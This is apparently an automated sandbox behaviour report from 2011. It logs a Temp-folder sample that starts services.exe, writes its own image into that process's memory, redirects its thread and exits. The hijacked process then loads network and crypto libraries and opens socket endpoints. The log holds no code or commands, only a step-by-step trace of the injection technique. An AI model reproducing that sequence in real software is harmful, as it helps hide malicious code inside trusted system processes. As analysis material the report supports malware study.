    Start date: 13/12/2011
    Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S
    Commandline: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\S
    Imagebase: 0x400000
    File size: 17925 bytes
    MD5 hash: 5EA58C5F12405A4E959234134123380D
    Section Activities:
    + Section loaded by Windows
    File Path Access Type Base Size Mapped to pid Protection Completion Count
    \KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
    unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
    \NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
    \NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
    \NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
    \KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
    \KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
    \KnownDlls\MSVCRT.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
    \KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
    \KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
    \KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
    \NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
    C:\WINDOWS\system32\services.exe query and write and read and execute and extend size image 850000 12288 own pid readonly success or wait 1
    \BaseNamedObjects\ShimSharedMemory write unknown 860000 57344 own pid read write success or wait 1
    C:\WINDOWS\system32\apphelp.dll write and read and execute commit 870000 126976 own pid execute success or wait 1
    C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
    C:\WINDOWS\AppPatch\sysmain.sdb read commit 870000 1208320 own pid readonly success or wait 1
    \KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    C:\WINDOWS\system32\services.exe write and read and execute commit 9A0000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\services.exe query and read commit 9A0000 110592 own pid readonly success or wait 1
    C:\WINDOWS\system32\services.exe write and read and execute commit 9A0000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\services.exe query and read commit 9A0000 110592 own pid readonly success or wait 1
    C:\WINDOWS\system32\services.exe query and read commit 870000 110592 own pid readonly success or wait 1
    Section loaded by program
    File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
    Process Activities:
    + Process started
    PID Filepath Cmdline Flags Completion Count Source Address
    388 C:\WINDOWS\system32\services.exe services.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S 0 success or wait 1 401376
    + Process terminated
    PID Filepath Completion Count Source Address
    1568 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S success or wait 1 401639
    1568 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S success or wait 0 401639
    Thread Activities:
    + Thread context set
    TID PID DR0 DR1 DR2 DR3 DR7 EFLAGS EIP Completion Count Source Address
    584 388 0 0 0 0 0 200 7C810705 success or wait 1 4012E0
    + Thread resumed
    TID PID Completion Count Source Address
    584 388 success or wait 1 4012EB
    Memory Activities:
    + Memory read
    PID Filepath Base Length Value Completion Count Source Address
    388 C:\WINDOWS\system32\services.exe 7FFDD008 4 00 00 00 01 success or wait 1 4011F0
    + Memory written
    PID Filepath Base Length Value Completion Count Source Address
    388 C:\WINDOWS\system32\services.exe 400000 1024 success or wait 1 401255
    388 C:\WINDOWS\system32\services.exe 401000 7168 success or wait 1 401292
    388 C:\WINDOWS\system32\services.exe 403000 2560 success or wait 1 401292
    388 C:\WINDOWS\system32\services.exe 404000 1024 success or wait 1 401292
    388 C:\WINDOWS\system32\services.exe 7FFDD008 4 00 00 40 00 success or wait 1 4012C9
    + Memory allocated
    PID Filepath Base Length Protection Completion Count Source Address
    1568 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S 880000 12FAA0 page read and write success or wait 1 4011B2
    388 C:\WINDOWS\system32\services.exe 400000 12FAB8 page execute and read and write success or wait 1 401238
    + Chronological sections
    Operation Data Completion Time
    Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 436014252
    Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 436035657
    Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 436055366
    Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 436057329
    Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 436061142
    Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 436062291
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 436063779
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 436081143
    Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 436085162
    Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 436086404
    Section loaded Path: \KnownDlls\MSVCRT.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 436093569
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 436102600
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 436105165
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 436107285
    Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 436109174
    Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 436112614
    Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 436117408
    Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 850000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 436141133
    Section loaded Path: C:\WINDOWS\system32\services.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 850000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 470841015
    Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 860000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 470842325
    Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 870000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 470844361
    Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 470845898
    Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 870000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 470848033
    Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 470853116
    Section loaded Path: C:\WINDOWS\system32\services.exe Access: write and read and execute Type: commit Baseaddress: 9A0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 470854851
    Section loaded Path: C:\WINDOWS\system32\services.exe Access: query and read Type: commit Baseaddress: 9A0000 Size: 110592 Protection: readonly Mapped to pid: own pid success or wait 470857410
    Section loaded Path: C:\WINDOWS\system32\services.exe Access: write and read and execute Type: commit Baseaddress: 9A0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 470859317
    Section loaded Path: C:\WINDOWS\system32\services.exe Access: query and read Type: commit Baseaddress: 9A0000 Size: 110592 Protection: readonly Mapped to pid: own pid success or wait 470860159
    Section loaded Path: C:\WINDOWS\system32\services.exe Access: query and read Type: commit Baseaddress: 870000 Size: 110592 Protection: readonly Mapped to pid: own pid success or wait 470871786
    Process created PID: 388 Path: C:\WINDOWS\system32\services.exe Cmdline: services.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Createflags: 0 success or wait 470873449
    Memory allocated PID: 1568 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Base: 880000 Length: 12FAA0 Allocation Type: null Protection: page read and write success or wait 471135549
    Memory read PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 7FFDD008 Length: 4 Value: 00 00 00 01 success or wait 471135708
    Memory allocated PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 400000 Length: 12FAB8 Allocation Type: null Protection: page execute and read and write success or wait 471135806
    Memory written PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 400000 Length: 1024 success or wait 471159539
    Memory written PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 401000 Length: 7168 success or wait 471186977
    Memory written PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 403000 Length: 2560 success or wait 471211536
    Memory written PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 404000 Length: 1024 success or wait 471242696
    Memory written PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 7FFDD008 Length: 4 Value: 00 00 40 00 success or wait 471273831
    Thread context set TID: 584 PID: 388 DR0: 0 DR1: 0 DR2: 0 DR3: 0 DR7: 0 EIP: 7C810705 EFLAGS: 200 Imagepath: null success or wait 471297483
    Thread resumed TID: 584 PID: 388 Path: C:\WINDOWS\system32\services.exe success or wait 471297621
    Process terminated PID: 1568 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S success or wait 471300492
    + Sections
    + General
    Start time: 04:13:17
    Start date: 13/12/2011
    Path: C:\WINDOWS\system32\services.exe
    Commandline: services.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S
    Imagebase: 0x1000000
    File size: 110592 bytes
    MD5 hash: 65DF52F5B8B6E9BBD183505225C37315
    File Activities:
    + File opened
    File Path Access Options Content overwritten Completion Count Source Address
    c:\autoexec.bat read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 401F92
    \Device\Afd\Endpoint synchronize and generic read and generic write no options true success or wait 2 401F92
    \Device\Afd\AsyncConnectHlp synchronize and generic read and generic write no options true success or wait 1 401F92
    Section Activities:
    + Section loaded by Windows
    File Path Access Type Base Size Mapped to pid Protection Completion Count
    \KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
    unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
    \NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
    \NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
    \NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
    \KnownDlls\MFC42.DLL write and read and execute unknown 270000 24576 own pid readonly object name not found 1
    C:\WINDOWS\system32\mfc42.dll query and write and read and execute image 73DD0000 987136 own pid read write success or wait 1
    \KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
    \KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
    \KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
    \KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
    \KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
    \KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
    \KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1
    \KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
    \KnownDlls\Normaliz.dll write and read and execute unknown 280000 36864 own pid read write conflicting addresses 1
    \KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1
    \KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
    \KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
    \KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
    \KnownDlls\WS2_32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1
    C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
    \KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1
    C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
    \KnownDlls\iphlpapi.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1
    C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1
    \KnownDlls\ShimEng.dll write and read and execute unknown 76D60000 102400 own pid read write object name not found 1
    C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
    C:\WINDOWS\AppPatch\sysmain.sdb read commit 290000 1208320 own pid readonly success or wait 1
    C:\WINDOWS\AppPatch\acadproc.dll write and read and execute commit 3D0000 40960 own pid execute success or wait 1
    C:\WINDOWS\AppPatch\acadproc.dll write and read and execute commit 3D0000 40960 own pid execute success or wait 1
    C:\WINDOWS\AppPatch\acadproc.dll query and write and read and execute image 47260000 61440 own pid read write success or wait 1
    \NLS\NlsSectionCType read unknown 3E0000 12288 own pid readonly success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 8E0000 1056768 own pid execute success or wait 1
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
    C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 390000 4096 own pid execute success or wait 1
    C:\WINDOWS\WindowsShell.Manifest query and read commit 390000 4096 own pid readonly success or wait 1
    C:\WINDOWS\WindowsShell.Manifest read commit 390000 4096 own pid readonly success or wait 1
    \KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
    C:\WINDOWS\system32\shell32.dll read commit 1020000 8462336 own pid readonly success or wait 1
    \KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
    C:\WINDOWS\system32\comctl32.dll read commit AF0000 618496 own pid readonly success or wait 1
    \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768 write unknown AF0000 32768 own pid read write success or wait 1
    \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Cookies_index.dat_16384 write unknown B00000 16384 own pid read write success or wait 1
    \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 write unknown B10000 32768 own pid read write success or wait 1
    \KnownDlls\RASAPI32.dll write and read and execute unknown B10000 32768 own pid read write object name not found 1
    C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
    \KnownDlls\rasman.dll write and read and execute unknown 76EE0000 245760 own pid read write object name not found 1
    C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
    \KnownDlls\NETAPI32.dll write and read and execute unknown 76E90000 73728 own pid read write object name not found 1
    C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
    \KnownDlls\TAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write object name not found 1
    C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
    \KnownDlls\rtutils.dll write and read and execute unknown 76EB0000 192512 own pid read write object name not found 1
    C:\WINDOWS\system32\rtutils.dll query and write and read and execute image 76E80000 57344 own pid read write success or wait 1
    \KnownDlls\WINMM.dll write and read and execute unknown 76E80000 57344 own pid read write object name not found 1
    C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
    C:\WINDOWS\system32\tapi32.dll read commit B20000 184320 own pid readonly success or wait 1
    \KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
    \KnownDlls\sensapi.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
    C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
    \BaseNamedObjects\SENS Information Cache read unknown B20000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\mswsock.dll write and read and execute commit DA0000 245760 own pid execute success or wait 1
    C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
    \KnownDlls\rasadhlp.dll write and read and execute unknown 71A50000 258048 own pid read write object name not found 1
    C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
    \KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    \BaseNamedObjects\Local\UrlZonesSM_Administrator query and write and read commit 77C00000 32768 own pid read write object name exists 1
    \KnownDlls\hnetcfg.dll write and read and execute unknown 77C00000 32768 own pid read write object name not found 1
    C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
    C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit B80000 20480 own pid execute success or wait 1
    C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
    \KnownDlls\msapsspc.dll write and read and execute unknown 71A90000 32768 own pid read write object name not found 1
    C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
    \KnownDlls\MSVCRT40.dll write and read and execute unknown 71E50000 86016 own pid read write object name not found 1
    C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
    \KnownDlls\schannel.dll write and read and execute unknown 78080000 69632 own pid read write object name not found 1
    C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
    \KnownDlls\CRYPT32.dll write and read and execute unknown 767F0000 163840 own pid read write object name not found 1
    C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
    \KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1
    C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
    \KnownDlls\digest.dll write and read and execute unknown 77B20000 73728 own pid read write object name not found 1
    C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
    \KnownDlls\msnsspc.dll write and read and execute unknown 75B00000 86016 own pid read write object name not found 1
    C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
    \KnownDlls\MSVCRT40.dll write and read and execute unknown 747B0000 290816 own pid read write object name not found 1
    C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
    C:\WINDOWS\system32\msv1_0.dll write and read and execute commit EA0000 139264 own pid execute success or wait 1
    C:\WINDOWS\system32\msv1_0.dll query and write and read and execute image 77C70000 151552 own pid read write success or wait 1
    \KnownDlls\cryptdll.dll write and read and execute unknown 77C70000 151552 own pid read write object name not found 1
    C:\WINDOWS\system32\cryptdll.dll query and write and read and execute image 76790000 49152 own pid read write success or wait 1
    Section loaded by program
    File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
    Thread Activities:
    + Thread delayed
    TID Delay Completion Count Source Address
    1412 1s success or wait 1 401387
    1412 180s no status 0 4016C3
    + Chronological sections
    Operation Data Completion Time
    Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 471330918
    Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 471342124
    Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 471346316
    Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 471349217
    Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 471353933
    Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 471354479
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 471357952
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 471358089
    Section loaded Path: \KnownDlls\MFC42.DLL Access: write and read and execute Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 471361874
    Section loaded Path: C:\WINDOWS\system32\mfc42.dll Access: query and write and read and execute Type: image Baseaddress: 73DD0000 Size: 987136 Protection: read write Mapped to pid: own pid success or wait 471367427
    Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 471382585
    Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 471392260
    Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 471402388
    Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 471438939
    Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 471453602
    Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 471460806
    Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 471482748
    Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 471499584
    Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 280000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 471542599
    Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 471571324
    Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 471625645
    Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 471732901
    Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 471895225
    Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 472044356
    Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 472088646
    Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 472182968
    Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 472197569
    Section loaded Path: \KnownDlls\iphlpapi.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 472229742
    Section loaded Path: C:\WINDOWS\system32\iphlpapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D60000 Size: 102400 Protection: read write Mapped to pid: own pid success or wait 472244854
    Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 76D60000 Size: 102400 Protection: read write Mapped to pid: own pid object name not found 472278883
    Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 472280117
    Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 290000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 472285398
    Section loaded Path: C:\WINDOWS\AppPatch\acadproc.dll Access: write and read and execute Type: commit Baseaddress: 3D0000 Size: 40960 Protection: execute Mapped to pid: own pid success or wait 472298134
    Section loaded Path: C:\WINDOWS\AppPatch\acadproc.dll Access: write and read and execute Type: commit Baseaddress: 3D0000 Size: 40960 Protection: execute Mapped to pid: own pid success or wait 472301057
    Section loaded Path: C:\WINDOWS\AppPatch\acadproc.dll Access: query and write and read and execute Type: image Baseaddress: 47260000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 472302302
    Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 3E0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 472351436
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 360000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 472384245
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 360000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 472386146
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 472386932
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8E0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 472469272
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 472470227
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 390000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 472480341
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 472481416
